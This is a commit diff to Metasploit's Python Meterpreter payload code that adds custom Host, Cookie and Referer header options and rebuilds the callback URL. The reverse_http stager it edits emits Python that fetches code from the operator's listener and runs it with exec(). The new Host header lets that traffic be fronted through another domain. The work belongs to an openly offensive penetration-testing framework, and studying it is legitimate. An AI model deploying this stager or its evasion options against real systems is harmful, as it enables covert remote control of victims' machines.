Custom host header support in python meterp

Author: OJ

lib/msf/core/payload/python/meterpreter_loader.rb

@@ -30,7 +30,10 @@ def initialize(info = {})
 
     register_advanced_options([
       OptBool.new('MeterpreterTryToFork', [ true, 'Fork a new process if the functionality is available', true ]),
-      OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ])
+      OptBool.new('PythonMeterpreterDebug', [ true, 'Enable debugging for the Python meterpreter', false ]),
+      OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+      OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+      OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
     ], self.class)
   end
 
@@ -88,10 +91,30 @@ def stage_meterpreter(opts={})
     http_user_agent = opts[:http_user_agent] || ds['MeterpreterUserAgent']
     http_proxy_host = opts[:http_proxy_host] || ds['PayloadProxyHost'] || ds['PROXYHOST']
     http_proxy_port = opts[:http_proxy_port] || ds['PayloadProxyPort'] || ds['PROXYPORT']
-
-    # patch in the stageless http(s) connection url
-    met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(opts[:url])}'") if opts[:url].to_s != ''
+    http_header_host = opts[:header_host] || ds['HttpHeaderHost']
+    http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie']
+    http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer']
+
+    # The callback URL can be different to the one that we're receiving from the interface
+    # so we need to generate it
+    # TODO: move this to somewhere more common so that it can be used across payload types
+    callback_url = [
+      opts[:url].split(':')[0],
+      '://',
+      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
+      ':',
+      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
+      ds['LURI'].to_s,
+      opts[:uri].to_s,
+      '/'
+    ].join('')
+
+    # patch in the various payload related configuration
+    met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
     met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+    met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+    met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+    met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
 
     if http_proxy_host.to_s != ''
       proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"

lib/msf/core/payload/python/reverse_http.rb

@@ -14,7 +14,10 @@ def initialize(info = {})
     register_options(
       [
         OptString.new('PayloadProxyHost', [ false, "The proxy server's IP address" ]),
-        OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ])
+        OptPort.new('PayloadProxyPort', [ true, "The proxy port to connect to", 8080 ]),
+        OptString.new('HttpHeaderHost', [false, 'An optional value to use for the Host HTTP header']),
+        OptString.new('HttpHeaderCookie', [false, 'An optional value to use for the Cookie HTTP header']),
+        OptString.new('HttpHeaderReferer', [false, 'An optional value to use for the Referer HTTP header'])
       ], self.class)
   end
 
@@ -24,11 +27,14 @@ def initialize(info = {})
   def generate(opts={})
     ds = opts[:datastore] || datastore
     opts.merge!({
-      host:       ds['LHOST'] || '127.127.127.127',
-      port:       ds['LPORT'],
-      proxy_host: ds['PayloadProxyHost'],
-      proxy_port: ds['PayloadProxyPort'],
-      user_agent: ds['MeterpreterUserAgent']
+      host:           ds['LHOST'] || '127.127.127.127',
+      port:           ds['LPORT'],
+      proxy_host:     ds['PayloadProxyHost'],
+      proxy_port:     ds['PayloadProxyPort'],
+      user_agent:     ds['MeterpreterUserAgent'],
+      header_host:    ds['HttpHeaderHost'],
+      header_cookie:  ds['HttpHeaderCookie'],
+      header_referer: ds['HttpHeaderReferer']
     })
     opts[:scheme] = 'http' if opts[:scheme].nil?
 
@@ -104,9 +110,18 @@ def generate_reverse_http(opts={})
       cmd << "hs.append(ul.ProxyHandler({'#{opts[:scheme]}':'#{var_escape.call(proxy_url)}'}))\n"
     end
 
+    headers = []
+    headers << "('User-Agent','#{var_escape.call(opts[:user_agent])}')"
+    headers << "('Cookie','#{var_escape.call(opts[:header_cookie])}')" if opts[:header_cookie]
+    headers << "('Referer','#{var_escape.call(opts[:header_referer])}')" if opts[:header_referer]
+
     cmd << "o=ul.build_opener(*hs)\n"
-    cmd << "o.addheaders=[('User-Agent','#{var_escape.call(opts[:user_agent])}')]\n"
-    cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n"
+    cmd << "o.addheaders=[#{headers.join(',')}]\n"
+    if opts[:header_host]
+      cmd << "exec(o.open(ul.Request('#{generate_callback_url(opts)}',None,{'Host':'#{var_escape.call(opts[:header_host])}'})).read())\n"
+    else
+      cmd << "exec(o.open('#{generate_callback_url(opts)}').read())\n"
+    end
 
     py_create_exec_stub(cmd)
   end